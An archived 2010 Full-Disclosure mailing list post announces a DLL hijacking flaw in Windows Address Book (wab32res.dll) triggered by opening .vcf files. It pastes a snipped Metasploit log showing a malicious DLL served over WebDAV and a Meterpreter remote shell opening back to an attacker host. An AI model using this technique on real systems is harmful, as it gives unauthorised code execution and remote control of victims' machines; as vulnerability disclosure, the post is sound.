lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Tue, 24 Aug 2010 13:57:42 -0500
From: matt <matt@...ackvector.org>
To: full-disclosure@...ts.grok.org.uk
Subject: DLL hijacking (Windows Address Book -
	wab32res.dll)

For those interested, I just discovered that the Windows Address Book is
vulnerable to DLL hijacking when opening .vcf (and probably other) file
types.

http://www.attackvector.org/new-dll-hijacking-exploits-many/

[..snip..]
[*] 10.0.0.252:1137 PROPFIND /hacku/wab32res.dll
[*] 10.0.0.252:1137 PROPFIND => 207 File (/hacku/wab32res.dll)
[*] 10.0.0.252:1133 GET => DLL Payload
[*] 10.0.0.252:1137 PROPFIND /hacku/rundll32.exe
[*] 10.0.0.252:1137 PROPFIND => 404 (/hacku/rundll32.exe)
[*] 10.0.0.252:1133 GET => DATA (/hacku/owned.vcf)
[*] Sending stage (748544 bytes) to 10.0.0.252
[*] Meterpreter session 4 opened (1.2.3.4:31337 -> 10.0.0.252:1155) at Tue
Aug 24 13:49:02 -0500 2010

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ